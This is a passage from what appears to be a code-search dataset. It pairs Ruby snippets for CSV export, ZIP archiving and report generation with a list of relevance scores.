Forestry Inc, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n else \n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, #{Partner.find(i.owner_id).name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n end\n end\n writer.puts @puts \n end\n end\n \n end\n \n #Written file is opened for sending and sent\n @file = File.open(\"#{@file_path}#{@filename}\", \"r\")\n \n send_data(@file.read, :type => \"csv\", :filename => @filename)\n end",
"def to_csv(path = nil)\n path = File.basename(@data.path, '.adt') + '.csv' if path.nil?\n FCSV.open(path, 'w', :force_quotes => true) do |csv|\n each do |record|\n csv << record.to_a\n end\n end\n end",
"def save_as_csv\n CSV.open(\"./db/#{@name}.csv\", \"wb\") {|csv| @result_scrap.to_a.each {|elem| csv << elem} }\n end",
"def export_csv(csv_data)\n\t\tFile.write(\"kfit_partners.csv\", csv_data.map(&:to_csv).join)\n\tend",
"def generateCSV data\n CSV.open(\"schools.csv\", \"wb\") do |csv|\n csv << [ \"school_name\", \"school_address\", \"school_type\", \"school_url\", \"school_area\"]\n data.each do |cell|\n csv << [ cell[\"school_name\"], cell[\"school_address\"], cell[\"school_type\"], cell[\"school_url\"], cell[\"school_area\"]]\n end\n end\nend",
"def csv_string\n CSV.generate do |csv|\n header.write_header csv\n records.each {|r| r.write_record csv}\n end\n end",
"def extract_csv_files_from_zipped_databases(zip_file_paths)\n zip_file_paths.map do |zip_file_path|\n base_directory = File.dirname(zip_file_path)\n filename_wo_ext = File.basename(zip_file_path, \".zip\")\n extraction_directory = File.join(base_directory, filename_wo_ext)\n\n puts \"Creating extraction directory: #{extraction_directory}\"\n FileUtils.mkdir_p(extraction_directory)\n\n puts \"Processing #{zip_file_path}:\"\n extracted_paths = []\n Zip::File.open(zip_file_path) do |zip_file|\n zip_file.each do |entry|\n # Extract each file\n destination_path = File.join(extraction_directory, entry.name)\n log \"Extracting #{entry.name} -> #{destination_path}\"\n if !File.exists?(destination_path)\n entry.extract(destination_path)\n end\n extracted_paths << destination_path\n end\n end\n extracted_paths\n end.flatten.uniq\n end",
"def extract_csv_files_from_zipped_databases(zip_file_paths)\n zip_file_paths.map do |zip_file_path|\n base_directory = File.dirname(zip_file_path)\n filename_wo_ext = File.basename(zip_file_path, \".zip\")\n extraction_directory = File.join(base_directory, filename_wo_ext)\n\n puts \"Creating extraction directory: #{extraction_directory}\"\n FileUtils.mkdir_p(extraction_directory)\n\n puts \"Processing #{zip_file_path}:\"\n extracted_paths = []\n Zip::File.open(zip_file_path) do |zip_file|\n zip_file.each do |entry|\n # Extract each file\n destination_path = File.join(extraction_directory, entry.name)\n log \"Extracting #{entry.name} -> #{destination_path}\"\n if !File.exists?(destination_path)\n entry.extract(destination_path)\n end\n extracted_paths << destination_path\n end\n end\n extracted_paths\n end.flatten.uniq\n end",
"def create_downloads(config, files)\n downloads = []\n # Write\n files&.each do |file|\n content_type = config[:format] == 'csv' ? 'text/csv' : 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n downloads << create_download(config[:user_id], file[:content], file[:filename], config[:export_type], content_type)\n end\n downloads\n end",
"def save_to_csv(jobs)\n CSV.open('../docs/cryptocurrencyjobslist.csv', 'wb') do |csv|\n csv << [\"Company\", \"Title\", \"Link\", \"Location\", \"Category\"]\n for i in 0..jobs.length-1\n csv << [jobs[i].company, jobs[i].title, jobs[i].listing_url, jobs[i].location, jobs[i].category]\n end\n end\nend",
"def save_csv\n CSV.open(@csv_file_path, 'wb') do |csv|\n @recipes.each do |recipe|\n csv << [recipe.name, recipe.description, recipe.rating, recipe.prep_time, recipe.tried]\n end\n end\n end",
"def index\n @initial_surveys = InitialSurvey.all\n respond_to do |format|\n format.html { render :action => \"index\" }\n format.csv { send_data InitialSurvey.to_csv(@initial_surveys) }\n end\n end",
"def generate\n @report = Report.find_or_initialize_by_key(params[:id])\n @report.generate_csv_zip\n @report.save\n redirect_to @report.csv.url\n end",
"def compressFiles\n Dir.chdir(\"#{@outputDir}/RDPsummary\")\n #system(\"tar -zcf #{@sampleSetName1}.tar.gz * --exclude=*.log --exclude=*.sra --exclude=*.sff --exclude=*.local.metadata\")\n system(\"tar czf class.result.tar.gz class\")\n system(\"tar czf domain.result.tar.gz domain\")\n system(\"tar czf family.result.tar.gz family\")\n system(\"tar czf genus.result.tar.gz genus\")\n system(\"tar czf order.result.tar.gz order\")\n system(\"tar czf phyla.result.tar.gz phyla\")\n system(\"tar czf species.result.tar.gz species\")\n system(\"tar czf pdf.result.tar.gz 'find . -name `*.pdf`'\")\n Dir.chdir(@scratch)\n end",
"def csv_export(config, patients, inner_batch_size)\n # Get all of the field data based on the config\n field_data = get_field_data(config, patients)\n\n # Determine selected data types for export\n data_types = CUSTOM_EXPORT_OPTIONS.keys.select { |data_type| field_data.dig(data_type, :checked).present? }\n\n files = []\n csvs = {}\n packages = {}\n\n data_types.each do |data_type|\n # Create CSV with column headers\n package = CSV.generate(headers: true) do |csv|\n csv << field_data.dig(data_type, :headers)\n csvs[data_type] = csv\n end\n packages[data_type] = package\n end\n\n # NOTE: in_batches appears to NOT sort within batches, so explicit ordering on ID is also done deeper down.\n # The reorder('') here allows this ordering done later on to work properly.\n patients.reorder('').in_batches(of: inner_batch_size).each do |batch_group|\n # Get export data in batches to decrease size of export data hash maintained in memory\n exported_data = get_export_data(batch_group.order(:id), config[:data], field_data)\n data_types.each do |data_type|\n exported_data[data_type]&.each { |record| csvs[data_type] << record }\n end\n end\n\n data_types.each do |data_type|\n files << { filename: build_export_filename(config, nil), content: StringIO.new(packages[data_type]) }\n end\n files\n end",
"def csvexport_all_tables\n @wires = Wire.all.sort_by {|obj| obj.kabeltyp}\n @switchgears_einbau = Switchgear.all.sort_by {|obj| obj.kennung}\n @switchgears = Switchgear.where(:typ => 1).sort_by {|obj| obj.kennung}\n @assemblies = Assembly.all.sort_by {|obj| obj.kennung}\n @electrical_installations = ElectricalInstallation.all.sort_by {|obj| obj.kennung}\n @drives = Drive.all.sort_by {|obj| obj.kennung}\n @devices = Device.all.sort_by {|obj| obj.definition}\n @iogroups = Iogroup.all.sort_by {|obj| obj.name}\n @switchgearcombinations = Switchgearcombination.all.sort_by {|obj| obj.name}\n @offertpositions = Offertposition.where(:subsubproject_id => params[:subsubproject_id]).sort_by {|obj| obj.name}\n @subsubproject = Subsubproject.find(params[:subsubproject_id])\n @subsubprojects = @subsubproject.subproject.subsubprojects.sort_by {|obj| obj.name}\n @subsystems = @subsubproject.subproject.project.subsystems.all.sort_by {|obj| obj.name}\n @units = Unit.where(:subsystem_id => @subsystems.pluck(:id)).sort_by {|obj| obj.name}\n\n CSV.open(\"export_all_tables#{Time.now.strftime(\"%Y-%m-%d-%H-%M\")}.csv\", \"wb\", {:headers => true, :encoding => \"iso-8859-1\", :col_sep => \";\"}) do |csv|\n csv << ['Geraetetypen', '']\n @devices.each do |entry| csv << [entry.id, entry.definition] end\n csv << ['SPS-Modultypen', '']\n @assemblies.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Frequenzumrichtertypen', '']\n @drives.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Kabeltypen', '']\n @wires.each do |entry| csv << [entry.id, entry.kabeltyp] end\n csv << ['Elektroinstallationstypen', '']\n @electrical_installations.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltschranktypen', '']\n @switchgears.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltschrankeinbautypen', '']\n @switchgears_einbau.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltgeraetekombinationen', '']\n @switchgearcombinations.each do |entry| csv << [entry.id, entry.name] end\n csv << ['IO-Gruppen', '']\n @iogroups.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Offertpositionen', '']\n @offertpositions.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Teilanlagen', '']\n @subsystems.each do |entry| csv << [entry.id, entry.name] end\n csv << ['TeilanlagenUnits', '']\n @units.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Projektversionen', '']\n @subsubprojects.each do |entry| csv << [entry.id, entry.name] end\n end\n\n redirect_to settings_path, :notice => \"Export wurde unter \" + Rails.root.to_s + \"/ abgelegt!\"\n end",
"def create_stub_csv_file\n File.rm(@@csv_location) if File.exist?(@@csv_location)\n CSV.open(@@csv_location, 'w') do |row|\n row << @@csv_headers\n end\n end",
"def writeCSV(file_name)\n generated_array = transaction(file_name)\n array_from_csv = read_file(file_name)\n final_hash = merge_arrays(array_from_csv, generated_array)\n binding.pry\n\n CSV.open(\"results.csv\", \"w\") do |row|\n final_hash.each do |nested_hash|\n row << [nested_hash[\"SKU\"], nested_hash[\"quantity\"]]\n end #end each nested_hash loop\n end #end csv loop\nend",
"def create_zip( ctx, file:, upload_dir:, archive_dir:, ** ) #File::Twin\n source_files = file.records\n\n zip_file = File.join( archive_dir, \"#{file.identifier}.zip\" )\n\n return false if File.exists?(zip_file)\n\n Zip::File.open(zip_file, Zip::File::CREATE) do |zip|\n source_files.each do |record|\n raise \"error with #{record.inspect}\" unless record.file_path # TODO: remove me\n\n name_in_zip = \"#{record.index}-#{File.basename(record.file_path)}\"\n\n zip.add( name_in_zip, File.join(upload_dir, record.file_path) ) # FIXME: this could break\n end\n end\n\n\n\n ctx[:zip] = zip_file\n end",
"def get_csv\n CSV.generate do |csv|\n csv << ['Name','Student ID','User ID','Role','Email Address','Sections']\n get_feed[:students].each do |student|\n name = student[:last_name] + ', ' + student[:first_name]\n user_id = student[:login_id]\n student_id = student[:student_id]\n email_address = student[:email]\n role = ENROLL_STATUS_TO_CSV_ROLE[student[:enroll_status]]\n sections = sections_to_name_string(student[:sections])\n csv << [name, student_id, user_id, role, email_address, sections]\n end\n end\n end",
"def create_dirs_in_zipfile(created_dirs, entry_path, output_stream); end",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => \"name\"\n collection = PostitTask.find :all, :order => @sort, :conditions => session[:conditions]\n # Creation of the file\n file_name = \"postit_task_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << [\"Nom\".trn,\"Description\".trn,\"Séquence\".trn]\n collection.each do |element|\n csv << [element.name,element.description,element.sequence]\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def create(data)\n file = File.open(@file, \"w\")\n CSV(file, col_sep: \",\") do |csv|\n csv << data.map{ |test| test[:identifier] }\n csv << data.map{ |test| test[:runtime] }\n end\n file.close\n end",
"def csv_export(export, dir, locale)\n status = \"ready\"\n\n begin\n Dump::CSVDump.new.dump(\n export.catalog.slug,\n File.join(dir, 'csv'),\n locale,\n export.with_files\n )\n zip(dir, export.pathname)\n rescue StandardError => e\n status = \"error\"\n Rails.logger.error \"[ERROR] Catalog dump: #{e.message}\"\n end\n\n export.update(status: status)\n send_mail(export)\n end",
"def create_file(storage_path, csv_record)\n FileUtils.mkdir_p(storage_dir)\n\n CSV.open(storage_path, 'ab') do |csv|\n csv << csv_record.keys\n end\n end",
"def export_files\n begin\n file_to_download = \"sample_non_compliance_question.csv\"\n send_file Rails.public_path + file_to_download, :type => 'text/csv; charset=iso-8859-1; header=present', :disposition => \"attachment; filename=#{file_to_download}\", :stream => true, :buffer_size => 4096\n rescue\n flash[:error] = MESSAGES[\"csv_export\"][\"error\"]\n redirect_to new_audit_path\n end\n end",
"def to_csv()\n all = general_info_csv() + \"\\r\\n\" +\n teacher_for_csv() + \"\\r\\n\" +\n contributor_to_csv() + \"\\r\\n\" +\n published_in_csv() + \"\\r\\n\" +\n text_fields_csv()\n all\n end",
"def write_batch_data\n data = []\n # Loop through each row of data\n @document.xpath('//Row').each do |xml_row|\n row = []\n # Loop through each column value\n @column_names.keys.each do |column|\n row.append(xml_row.xpath(column).text)\n end\n data.append(row)\n end\n\n # Write the data to a csv file\n CSV.open(csv_file_path, 'a') do |csv|\n # Add each row by row\n data.each do |row|\n csv << row\n end\n end\n end",
"def export_designs_csv(oligo_designs)\r\n xfmt = ExportField::EXPORT_FMT\r\n csv_string = CSV.generate(:col_sep => \"\\t\") do |csv|\r\n csv << (ExportField.headings(xfmt) << 'Extract_Date')\r\n\r\n oligo_designs.each do |oligo_design|\r\n fld_array = []\r\n oligo_annotation = oligo_design.oligo_annotation\r\n\r\n ExportField.fld_names(xfmt).each do |model, fld|\r\n if model == 'oligo_design'\r\n fld_array << oligo_design.send(fld) \r\n\r\n elsif model == 'oligo_annotation'\r\n fld_array << oligo_annotation.send(fld) if oligo_annotation\r\n fld_array << ' ' if oligo_annotation.nil?\r\n end\r\n end\r\n\r\n csv << (fld_array << Date.today.to_s)\r\n end\r\n end\r\n return csv_string\r\n end",
"def create_scale_results_csv_file(scale_results_parent_dir)\n CSV.open(\"#{scale_results_parent_dir}/PERF_SCALE_#{@scale_timestamp}.csv\", \"wb\") do |csv|\n headings = [\"agents\",\n \"ok\",\n \"ko\",\n \"combined mean\",\n \"catalog mean\",\n \"filemeta plugins mean\",\n \"filemeta pluginfacts mean\",\n \"locales mean\",\n \"node mean\",\n \"report mean\",\n \"average CPU %\",\n \"average memory\"]\n\n csv << headings\n end\n end",
"def to_a11_submissions_csv(start_date:, end_date:)\n non_flagged_submissions = self.submissions.non_flagged.where(\"created_at >= ?\", start_date).where(\"created_at <= ?\", end_date)\n return nil unless non_flagged_submissions.present?\n\n header_attributes = [\n \"standardized_question_number\",\n \"standardized_question_identifier\",\n \"customized_question_text\",\n \"likert_scale_1\",\n \"likert_scale_2\",\n \"likert_scale_3\",\n \"likert_scale_4\",\n \"likert_scale_5\",\n \"response_volume\",\n \"notes\",\n \"start_date\",\n \"end_date\"\n ]\n\n @hash = {\n answer_01: Hash.new(0),\n answer_02: Hash.new(0),\n answer_03: Hash.new(0),\n answer_04: Hash.new(0),\n answer_05: Hash.new(0),\n answer_06: Hash.new(0),\n answer_07: Hash.new(0)\n }\n\n # Aggregate likert scale responses\n non_flagged_submissions.each do |submission|\n @hash.keys.each do |field|\n response = submission.send(field)\n if response.present?\n @hash[field][submission.send(field)] += 1\n end\n end\n end\n\n # TODO: Needs work\n CSV.generate(headers: true) do |csv|\n csv << header_attributes\n\n @hash.each_pair do |key, values|\n @question_text = \"123\"\n if key == :answer_01\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 1\n elsif key == :answer_02\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 2\n elsif key == :answer_03\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 3\n elsif key == :answer_04\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 4\n elsif key == :answer_05\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 5\n elsif key == :answer_06\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 6\n elsif key == :answer_07\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 7\n end\n\n csv << [\n standardized_question_number,\n key,\n @question_text,\n values[\"1\"],\n values[\"2\"],\n values[\"3\"],\n values[\"4\"],\n values[\"5\"],\n response_volume,\n \"\", # Empty field for the user to enter their own notes\n start_date,\n end_date\n ]\n end\n\n end\n end",
"def genDataZip(dir='generated', file_name='OdinSampleDataSet.zip', zip_dir='generated')\n # make sure the target file does not already exist\n # if it does, rename it to a tmp file\n runShellCommand(\"zip -j #{dir}/#{file_name} #{zip_dir}/*.xml #{zip_dir}/*.ctl\")\nend",
"def add_files(zip)\n ZipFileGenerator.new(@manifest.base_dir, zip).write\n end",
"def to_csv\n initialize_generator\n csv_report_generator.records = pull_join\n csv_report_generator.generate_report\n end",
"def write()\n entries = Dir.entries(@inputDir); entries.delete(\".\"); entries.delete(\"..\"); entries.delete(\"yamproject.json\"); entries.delete(\".DS_Store\")\n io = Zip::File.open(@outputFile, Zip::File::CREATE);\n writeEntries(entries, \"\", io)\n io.close();\n end",
"def csv_writer(rows)\n headers = [\"name\", \"capacity\", \"storage\"]\n CSV.open(\"reservoir_data.csv\", 'w') do |csv|\n csv << headers\n rows.each do |row|\n csv << row\n end\n end\nend",
"def index\n @surveys = Survey.all\n\n respond_to do |format|\n format.html\n #format.csv { send_data @surveys.to_csv }\n end\n end",
"def zip_dump\n\t system(\"mongodump --host localhost --db #{@mongo_database} --out #{@base_path}\")\n\t Dir[@base_path + '*.zip'].select { |e| File.delete(e) }\n\t Zip::File.open(@zipfile_name, Zip::File::CREATE) do |zipfile|\n\t Dir[File.join(@directory, '**', '**')].each do |file|\n\t\t zipfile.add(file.sub(@directory + '/', ''), file)\n\t end\n\t end\n\t end",
"def write(path)\n @path = path\n contents = process_dataframe\n\n if compression?(:gzip, '.csv.gz')\n require 'zlib'\n ::Zlib::GzipWriter.open(@path) do |gz|\n contents.each { |content| gz.write(content.to_csv(@options)) }\n gz.close\n end\n else\n csv = ::CSV.open(@path, 'w', @options)\n contents.each { |content| csv << content }\n csv.close\n end\n end",
"def outputCSV(reviews, store)\n if reviews.any?\n CSV.open(\"./reviews.csv\", \"wb\") do |csv|\n csv << [\"store\", \"date\", \"version\", \"author\", \"rating\", \"subject\", \"review\"]\n reviews.each_with_index do |review, index|\n csv << [store[:name], review[:date], review[:version], review[:author], review[:rating], review[:subject], review[:body]]\n end\n end\n end\nend",
"def build_csv(file_name)\n\t\t\t\t\t\tarr = [\"Location URN\", \"Email List\"]\n\t\t\t\t\t\t\t\tCSV.open(file_name, \"wb\") do |csv|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcsv << arr\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tend\nend",
"def process_and_create_zip_file\n @project = Project.find(params[:format].to_i)\n compressed_filestream = Zip::OutputStream.write_buffer do |zos|\n @project.testcases.each do |p|\n zos.put_next_entry p.testfile_file_name\n zos.print(Paperclip.io_adapters.for(p.testfile).read)\n\n\n zos.put_next_entry p.output_file_name\n zos.print(Paperclip.io_adapters.for(p.output).read)\n\n end\n end\n compressed_filestream.rewind\n send_data compressed_filestream.read, filename: \"testcases.zip\"\n end",
"def generateReport\n filePath = \"#{@reportFolder}/report.csv\"\n file = File.open(filePath, 'w')\n file.puts ['Screen', 'Description', 'Automation Message', 'Status'].join(',')\n @report.each do |result|\n file.puts result.join(',')\n end\n file.close\n end",
"def flavor_report_csv(filename)\n puts 'Creating the Flavors report'\n CSV.open(\"#{filename}\", 'ab') do |csv|\n csv << [\"\\n\"]\n csv << %w(Compute_Template_List)\n csv << %w(Template_Name VCPU Memory Min_VCPU Max_VCPU Min_EC Desired_EC Max_EC Dedicated_CPU Min_Mem Max_Mem Proc_Compatibility_Mode CPU_Pool_Name Shared_CPU_Weight SRR_Capability)\n flavor_report\n csv_array(@flavor_print_array, csv)\n end\n puts 'Done'\n end",
"def make_temp_csv_directory\n unless File.directory?('temp_csv')\n FileUtils.mkdir_p('temp_csv')\n end\nend",
"def period_csv\n CSV.generate do |csv|\n report_details.each { |a| csv.add_row(a) }\n csv.add_row [] # Blank row\n time_period_table.each { |a| csv.add_row(a) }\n end\n end",
"def csv_to_table\n\t\tpath = File.join(Rails.root, \"db/seed_data\")\n\t\tDir.foreach(path) do |file|\n\t\t\tif file.include?(\".csv\")\n\t\t\t\theader_row = nil\n\t\t\t\tmodel = File.basename(file, File.extname(file)).camelcase.constantize\n\t\t\t\tmodel.delete_all\n\t\t\t\tCSV.foreach(File.join(path,file)) do |row|\n\t\t\t\t\tif header_row.nil?\n\t\t\t\t\t\theader_row = row\n\t\t\t\t\t\tnext\n\t\t\t\t\tend\n\t\t\t\t\tattributes = {}\n\t\t\t\t\trow.each_index do |i|\n\t\t\t\t\t\tattributes[header_row[i].to_sym] = row[i]\n\t\t\t\t\tend\n\t\t\t\t\tmodel.create!(attributes)\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\tend"
] |
[
"0.6584274",
"0.6402949",
"0.63745075",
"0.6325527",
"0.6291515",
"0.6248007",
"0.62397605",
"0.61585194",
"0.6032448",
"0.59960437",
"0.59375465",
"0.58912754",
"0.58630097",
"0.5854191",
"0.5815545",
"0.5760578",
"0.57358134",
"0.5724562",
"0.5718807",
"0.5694275",
"0.5690729",
"0.56758934",
"0.5670116",
"0.56696594",
"0.56632906",
"0.5635845",
"0.5630232",
"0.562858",
"0.5614204",
"0.5612819",
"0.5610765",
"0.5601237",
"0.5599516",
"0.5591162",
"0.5576301",
"0.55644387",
"0.5559242",
"0.5558275",
"0.55495316",
"0.5545492",
"0.55316323",
"0.55240214",
"0.5491712",
"0.5482242",
"0.54797494",
"0.547851",
"0.54646486",
"0.54506814",
"0.54468906",
"0.54423326",
"0.54291296",
"0.5427627",
"0.54252034",
"0.54241455",
"0.5423497",
"0.5414389",
"0.5404114",
"0.54025865",
"0.5394552",
"0.538635",
"0.538635",
"0.53860164",
"0.53765666",
"0.5370473",
"0.53562814",
"0.535628",
"0.53551364",
"0.53483236",
"0.5340218",
"0.533509",
"0.5324976",
"0.532487",
"0.5317655",
"0.53155303",
"0.5310745",
"0.53046364",
"0.5294088",
"0.5293138",
"0.5292712",
"0.52891356",
"0.5281575",
"0.5277574",
"0.5276202",
"0.5266545",
"0.5259518",
"0.52580196",
"0.5254186",
"0.52497387",
"0.52440906",
"0.5242573",
"0.5242382",
"0.5240073",
"0.52310705",
"0.52310544",
"0.52298534",
"0.52230567",
"0.5219715",
"0.52082497",
"0.52063435",
"0.5200133"
] |
0.6876076
|
0
|
adds conversion, conversionrate, confidence and change attrs to passed array
|
def add_analytics_data(page_analytics_results)
control = page_analytics_results.first
treatments = page_analytics_results[1..-1]
calculations = calculate_conversion_data(control, treatments)
append_data_to_groups!(control, treatments, calculations)
page_analytics_results
end
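# Editor's sketch (illustrative only, not part of the original record): the
# positive document above calls two helpers, calculate_conversion_data and
# append_data_to_groups!, whose definitions are not included in this record.
# The bodies below are assumptions -- the real group objects, the field names
# :visits and :conversions, and the confidence math are not shown in the source.
def calculate_conversion_data(control, treatments)
  # Assumed shape: each analytics group is Hash-like with :visits and
  # :conversions counts.
  control_rate = control[:conversions].to_f / control[:visits]
  treatments.map do |t|
    rate = t[:conversions].to_f / t[:visits]
    {
      conversion: t[:conversions],
      conversionrate: rate,
      # Relative change of the treatment rate versus the control rate.
      change: control_rate.zero? ? 0.0 : (rate - control_rate) / control_rate
      # A :confidence value (e.g., from a two-proportion z-test) would also be
      # computed here; the statistical details are not given in the source.
    }
  end
end

def append_data_to_groups!(control, treatments, calculations)
  # Copies each treatment's calculated attrs onto its group in place; control
  # is accepted only to mirror the call site above.
  treatments.zip(calculations).each do |treatment, calc|
    calc.each { |attr, value| treatment[attr] = value }
  end
end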
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def tributes *attrs\n if attrs.empty? \n @tributes ||= []\n else \n @tributes = attrs\n super *attrs\n end \n end",
"def update_attributes(atts)\n atts.each { |att, val| send(:\"#{att}=\", val) }\n end",
"def update!(**args)\n @attribute_protos = args[:attribute_protos] if args.key?(:attribute_protos)\n end",
"def update_attributes(atts)\n atts.delete('_type')\n atts.each { |att, val| send(:\"#{att}=\", val) }\n end",
"def extends_params(param_array)\n if @attr == nil\n @attr = param_array\n else\n @attr = @attr.concat(param_array)\n @attr.uniq! { |s| s.first }\n end\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @tag = args[:tag] if args.key?(:tag)\n end",
"def continuize!\n @data.each_index do |data_index|\n @data[data_index].each do |attribute_name, attribute|\n att_type = @attributes.find { |attr| attr[:name] == attribute_name }\n #class is a special case. Store original value\n if att_type[:name] == \"class\" or att_type[:name] == @class_attribute\n @old_class_nominal_attributes = att_type[:nominal_attributes]\n end\n\n if att_type[:type] == \"string\" or att_type[:type] == \"nominal\"\n @data[data_index][attribute_name] = att_type[:nominal_attributes].find_index(attribute)\n end\n end\n end\n\n #change attribute types\n @attributes.each do |attribute|\n if attribute[:type] == \"string\" or attribute[:type] == \"nominal\"\n attribute[:type] = \"numeric\"\n attribute[:old_nominal_attributes] = attribute[:nominal_attributes]\n attribute[:nominal_attributes] = nil\n end\n end\n self\n end",
"def lively_attributes(*args)\n self._active_attributes += args.collect(&:to_s)\n end",
"def add_additional_attributes\n\n\t\t#gets an array of scraped attributes from the Scraper Class method #scrape_specific_concert\n\t\tattribute_array = SfBayAreaConcertsCliApp::Scraper.scrape_specific_concert(self.url)\n\t\n\t\t#assigns the attributes to the concert instance based on the array index\n\t\tself.ticket_price = attribute_array[0]\n\t\tself.bio = attribute_array[1]\n\t\tself.artist_website = attribute_array[2]\n\t\tself.where_to_find_music = attribute_array[3]\n\t\tself.facebook = attribute_array[4]\n\t\tself.twitter = attribute_array[5]\n\t\tself.instagram = attribute_array[6]\n\t\tself.youtube = attribute_array[7]\n\t\tself.buy_tickets_link = attribute_array[8]\n\t\t\n\tend",
"def set_attrs\n @rrules ||= []\n @exrules ||= []\n @rdates ||= []\n @exdates ||= []\n end",
"def update_attributes(attribs = {})\n attribs.each { |name, value| write_attribute(name, value) }\n end",
"def add_attributes(record, attrs)\n if attrs.is_a?(Array)\n attrs.each { |attr| self.add_attribute(record, attr) }\n elsif attrs.is_a?(Hash)\n attrs.each do |attr_name, value|\n self.add_attribute(record, attr_name, value)\n end\n else\n self.add_attribute(record, attrs)\n end\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def update(attrs)\n super(attrs)\n end",
"def updated_dynamic_attributes_array(instance_info_array, opts = {})\n updated_instance_info_array = get_updated_info(instance_info_array)\n updated_instance_info_array.map { | instance_info| OutputSettings.dynamic_attributes(instance_info, opts) }\n end",
"def update_attributes(attrs)\n nattrs = attrs.reduce({}) do |acc, a|\n ak, av = a\n case ak\n when :list, :listed_object, :owner\n else\n acc[ak] = av\n end\n\n acc\n end\n\n super(nattrs)\n end",
"def parse_attributes! #:nodoc:\n self.attributes = (attributes || []).map do |attr|\n Barbecue::Generators::GeneratedAttribute.parse(attr)\n end\n end",
"def update!(**args)\n @mean_attributions = args[:mean_attributions] if args.key?(:mean_attributions)\n end",
"def propagate_attributes(eventtemplate, attribute_arr)\n \n @eventtemplate = eventtemplate\n @attribute_arr = attribute_arr\n\n @eventtemplate.events.each do |event|\n\n if @attribute_arr['copy_name']\n event.name = @eventtemplate.name\n event.slug = nil\n end\n\n if @attribute_arr['copy_shortdescription']\n event.shortdescription = @eventtemplate.shortdescription\n end\n\n if @attribute_arr['copy_longdescription']\n event.longdescription = @eventtemplate.longdescription\n end\n\n if @attribute_arr['copy_bottom_text']\n event.bottom_text = @eventtemplate.bottom_text\n end\n\n # the price of the event\n if @attribute_arr['copy_full_price_cents']\n event.full_price = @eventtemplate.full_price\n end\n\n # the flag if early signup pricing is allowed\n # activate when eventtemplates allow for offset (not absolute dates) for field early_signup_deadline\n # if @attribute_arr['copy_early_signup_pricing']\n # event.early_signup_pricing = @eventtemplate.early_signup_pricing\n # event.save\n # end\n\n # the early signup price itself\n if @attribute_arr['copy_price_early_signup_cents'] && event.early_signup_pricing\n event.price_early_signup_cents = @eventtemplate.price_early_signup_cents\n end\n # save all changes\n event.save\n\n end\n\n return @eventtemplate\n end",
"def adjust!(attributes,reload=false)\n all.adjust!(attributes,reload)\n end",
"def apply_params(params)\n params.each do |attribute, value|\n assign_attribute(attribute, value)\n end\n end",
"def apply_params(params)\n params.each do |attribute, value|\n assign_attribute(attribute, value)\n end\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @iou_threshold = args[:iou_threshold] if args.key?(:iou_threshold)\n @mean_average_precision = args[:mean_average_precision] if args.key?(:mean_average_precision)\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs,(attr,values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def array_converter(*args)\n \nend",
"def rebuild_weight_array\n end",
"def build_taxes_with_attributes(attrs, rejecting=false)\r\n raise Sage::BusinessLogic::Exception::IncorrectDataException, \r\n \"Tax attributes should be an array of taxes\" unless attrs.is_a?(Array)\r\n \r\n raise Sage::BusinessLogic::Exception::IncorrectDataException, \r\n \"Taxes Version One can handle only 2 taxes but received #{attrs.size} taxes\" if attrs.size > 2\r\n \r\n attrs.each_with_index do |attrs, index|\r\n # has_many proxy is not working with STI\r\n tax = Tax.new\r\n self.taxes << tax \r\n good_params = ( rejecting ? tax.reject_unknown_attributes(attrs) : attrs )\r\n tax.attributes = good_params\r\n tax.profile_key = ::Tax::TaxesVersionOne.tax_keys[index]\r\n end\r\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs, (attr, values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @mean_average_precision = args[:mean_average_precision] if args.key?(:mean_average_precision)\n @precision_window_length = args[:precision_window_length] if args.key?(:precision_window_length)\n end",
